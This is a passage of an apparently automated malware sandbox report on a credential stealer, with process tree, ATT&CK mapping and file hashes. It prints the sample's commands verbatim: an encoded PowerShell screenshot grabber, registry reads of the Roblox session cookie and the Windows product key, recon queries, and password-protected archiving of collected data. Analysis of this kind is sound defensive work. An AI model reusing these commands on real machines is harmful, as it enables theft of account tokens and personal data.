G8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:696
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4156
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3zdjh2fl\3zdjh2fl.cmdline"
        5⤵
        
        PID:4884
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEBD7.tmp" "c:\Users\Admin\AppData\Local\Temp\3zdjh2fl\CSC50F473442FFA49A6A531DF7335943D76.TMP"
        6⤵
        
        PID:3816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4348
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      PID:3508
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:792
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4900
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      PID:404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:2332
  - - C:\Windows\SysWOW64\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Views/modifies file attributes
      PID:3512
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4800
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Views/modifies file attributes
      PID:3588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3388
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      PID:3800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:676
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      PID:1116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2164
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2760
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:404
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      PID:3516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:1956
  - - C:\Windows\SysWOW64\getmac.exe
      getmac
      4⤵
      PID:1140
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4364
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4560
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3892
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI16042\rar.exe a -r -hp"no" "C:\Users\Admin\AppData\Local\Temp\n3jtY.zip" *"
    3⤵
    PID:1576
  - - C:\Users\Admin\AppData\Local\Temp\_MEI16042\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI16042\rar.exe a -r -hp"no" "C:\Users\Admin\AppData\Local\Temp\n3jtY.zip" *
      4⤵
      Executes dropped EXE
      PID:1444
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4200
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:4556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:3976
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:768
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:4832
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2528
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4636
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:4824
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2792

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1124

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xe0,0x10c,0x7ffca251ab58,0x7ffca251ab68,0x7ffca251ab78
  2⤵
  PID:1160
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1528 --field-trial-handle=1836,i,15305644110448725250,7594185021229487038,131072 /prefetch:2
  2⤵
  PID:1060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1892 --field-trial-handle=1836,i,15305644110448725250,7594185021229487038,131072 /prefetch:8
  2⤵
  PID:3576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2220 --field-trial-handle=1836,i,15305644110448725250,7594185021229487038,131072 /prefetch:8
  2⤵
  PID:4800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3048 --field-trial-handle=1836,i,15305644110448725250,7594185021229487038,131072 /prefetch:1
  2⤵
  PID:4456
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3088 --field-trial-handle=1836,i,15305644110448725250,7594185021229487038,131072 /prefetch:1
  2⤵
  PID:2276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3456 --field-trial-handle=1836,i,15305644110448725250,7594185021229487038,131072 /prefetch:1
  2⤵
  PID:2936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4332 --field-trial-handle=1836,i,15305644110448725250,7594185021229487038,131072 /prefetch:8
  2⤵
  PID:2816
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4328 --field-trial-handle=1836,i,15305644110448725250,7594185021229487038,131072 /prefetch:8
  2⤵
  PID:3816
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4456 --field-trial-handle=1836,i,15305644110448725250,7594185021229487038,131072 /prefetch:1
  2⤵
  PID:3064

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:844

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
4bd78f4f6e4a84850b4f421ba99c8c6c

SHA1
f0df750f49383e547a31bed9a546daa77458913c

SHA256
45e26192dbdc49052c6cda0b2c4c2854cf46d899bbdf627e723f5d6d4f774885

SHA512
dbc631d30a818e17b36a94a8730361d5d88cf00c79810a1adfd3264a88f1d39018694947d2677ad873dda2b032e2fc8f7024be692d9473c4108b86e296e6d50c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
628a2652787b4c1f34a39726d5e80dad

SHA1
94874b034710297d410caeff1597ff87d2a8e003

SHA256
fd34f8f833198404116307310e5598053f5733cde7c9e3d4a1afea15e47b39f0

SHA512
286bcd08edb7a13049b1647edb19c244bdc49afa57ef009b753fbc5d3e1f36ab40afa715473409fcb1d4231eaa5f75d175c82222a26174b4741a40ae16da212d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
43b1ebc87ae7294ace31b9c5ca9cb70c

SHA1
c8224d4e5f57b329c456e8458e34e65697628b51

SHA256
3163d4cecadafb30e6de3be6f67fbb763c95f95a8d7cbec024f2beb175e51beb

SHA512
08292ea19a2938e6400dd4992e6bbc118cfd8ce68ae462f7c36bbb164cdecbd4e9a45cf64e35341a9d33c731d1e0f5d222ec73f3e68371860de9874041321c1f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
5e93e03b22920e27de6911150e8f0142

SHA1
3e574f2ce5b58316b1f4af6f0a29104b1c6529ac

SHA256
6ecb6db1bef3cc4113b5e963d9c2f9fbc9c0c6257b76cb219d675920e5b43b23

SHA512
2cd2a6e13e843a06e6cb1eba69b148a262427f8ef1a6942d370f95e313e3d14c64348d8599338d5d4ec85d223e302ed6d45bc4e8031e4f73772d9ca05c24315d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
251KB

MD5
6797149d6e7f87350b30e6ada5c59d4c

SHA1
c5242f0875c239636475a57325d92516ff79e71f

SHA256
334907370e352e4effdf0349d409cfe76d009788525407eae45645ffd60b4f95

SHA512
850066004c3e38a43a042b549ceae540e1d2b4a34ff9802ceaaf8be49064e66a71a570295c3917a5ff22830a15683cbb0e9396a34401ac5b3a177c3550984c69

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
4eeab497d4bd6baf5014b1eb05f6d3aa

SHA1
fb3ab7bcef9705d14799c079a6b824d54bc13da9

SHA256
4626657812181188279c8322bd6e4592501724258a90ea9e2f48d754e96cb5c3

SHA512
c13bba70059c3b9a0a14abd2be0b89ecf47271138192d820f162c728b6b8104accb83d3d3e0e6414665eae6d679a9e1fcfd64536b3a5ecedb40b42850f2d4fd8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
f6b9bf2aed07c8b70447853bc9733656

SHA1
07ead4afc9e97dd85b7f555e492248390583f26b

SHA256
c04854ff59d30f99c8c8d39c0ba37af156abc5b29ebf46c00aa9d20de4731c3d

SHA512
5310563a31194f39ce5b9fbb77ec007951c8886997edf36e28adcac8f5fae07b97c54f3969a2843342116ba11cac1b6997aac7bba4a9b965c8c0d1eadb51cb7e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
bcf9ebf26c618bbfd567243151b58c1c

SHA1
4a17a83411f6668a62dedf482435b7c5c5be20ac

SHA256
cb0815a4bf237aa1de684d78cfc4ceb6957e1eb34e661f5cbd1e2dc2d60fcbd3

SHA512
2a83071b34cd4fad51a0cb973b3ec5ce43d0c9a593407c73732bfd0c1ed2bed2dff5adea4931450a47f7750ec8f66ffd0fd406ae9329ccf3f757df2a00dc2703

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
aea23bd58500cfc31d034a3a0bafeb25

SHA1
8d56415dcfd44d2bf6375f8c93d37fc37227eb09

SHA256
ff154c12861680ec953a9e8c3315e280ece8f9654595cb7c8f60b6fc258752de

SHA512
bfe6f09cef31f5931946bff1e9e89aa4a02677725a256b03f62520762a68627b8d59cc90f489031e3df6a15223348158c5feffc05070273f5c7c139217e9481c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
ddabf2316a17930dab489044ca285fb6

SHA1
77f8200c28f2e7cc10c8f486264c8f8185470bab

SHA256
37117350dc42135f657fff283e142a0cb1ab2b16ee85c8cb291f5366f3443a4c

SHA512
86fdbd8965b6587dce94e48e522ea1102da97350e1968fcd032646504440646be9114c7af322d4b6494af768065691e33995931b6c299a38b98ce9d6e37c5850

Download Submit
C:\Users\Admin\AppData\Local\Temp\3zdjh2fl\3zdjh2fl.dll

Filesize
4KB

MD5
443d51407ba8971027513a41fdb73f03

SHA1
45345b59806bf804104853d9b49395d087ab92fd

SHA256
5c11f09bea2dea1579196bb64ba0a4f7f89730bd105d7d936724f4a13822ed4e

SHA512
0483215f82fd61e3e4b4e0f1b1ee9f3b19c1dc0325f62377f294306482832ff6c3c45ca8a0b415d19c07683c13621eac39aa33556694dfb9a432b60170b88d88

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESEBD7.tmp

Filesize
1KB

MD5
3820e8f2ec034c9119824e8744ecc53d

SHA1
07d08921e2a527edc3ca2639ded12d136f0ae68f

SHA256
f4353d1ac5bb6534ba3bfa466c02404cc297aa979c63841ad97b6a13136f09df

SHA512
4f771a6b7449e6db4aab350eefa0edaea05cd2a37ecaca3275a4ac37da48cb278254922acdd49be00b8d91759cc06a1aa4cfe7648ce601beb67e78dc35405bb1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16042\VCRUNTIME140.dll

Filesize
88KB

MD5
1d4ff3cf64ab08c66ae9a4013c89a3ac

SHA1
f9ee15d0e9b0b7e04ff4c8a5de5afcffe8b2527b

SHA256
65f620bc588d95fe2ed236d1602e49f89077b434c83102549eed137c7fdc7220

SHA512
65fbd68843280e933620c470e524fba993ab4c48ede4bc0917b4ebe25da0408d02daec3f5afcd44a3ff8aba676d2eff2dda3f354029d27932ef39c9fdea51c26

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16042\_bz2.pyd

Filesize
44KB

MD5
524989939f0351e080644e8c34ccfae5

SHA1
5d8974926381f844118c8b5455d0e7e133f7566c

SHA256
2fd24d9893d41508d1736972f1a4fb241c93beaa49895977e563faf8214410de

SHA512
f6800a7eb6f655e8ebd2c2c33da02252a019ab3085d1947dd50a69206fc2be912c8e11ff10119c4374996248c0ef4d92462043dce4bc08065ebbd12ba82cbaf4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16042\_ctypes.pyd

Filesize
52KB

MD5
c917494b6c8c29361e42072dd17ade16

SHA1
f06b04f2c2cf9d84b7d25bb9aeebc6436d2b2bdf

SHA256
bf1454154ea8b62616461660e084c13d199f0570dc14f0e02d25b053f63ce300

SHA512
b064494c6c292969a8694f006f691b9ba00181a1d11c310ddfaa94f3b908248e5098a9e322008ee081e215c1aeed5b6c4bfeab7ac84e0dd88999fc094b4f672f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16042\_decimal.pyd

Filesize
79KB

MD5
35642e5645ccfa5fa3616a4f171c6ab0

SHA1
b555808ca4ba195941ad9b50fe95f9d6ce0a8d50

SHA256
f57bd98ca4c2a7a67e6104e6eab7acf7f6a0c0f09d88efcb1688d67e298b6d7c

SHA512
4eb499dd35002982b4b37fe27a870b8a53248657e01b9aeaf25d2485c9fbef474d2f2cbe1e945b1301c87db840913d9cb802ba861e10f59010ae2e5a50f044ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16042\_hashlib.pyd

Filesize
30KB

MD5
fc7927b65769cf47c6299402acdff309

SHA1
ab31ac116af567e551e5de9c6a5d69e98726b561

SHA256
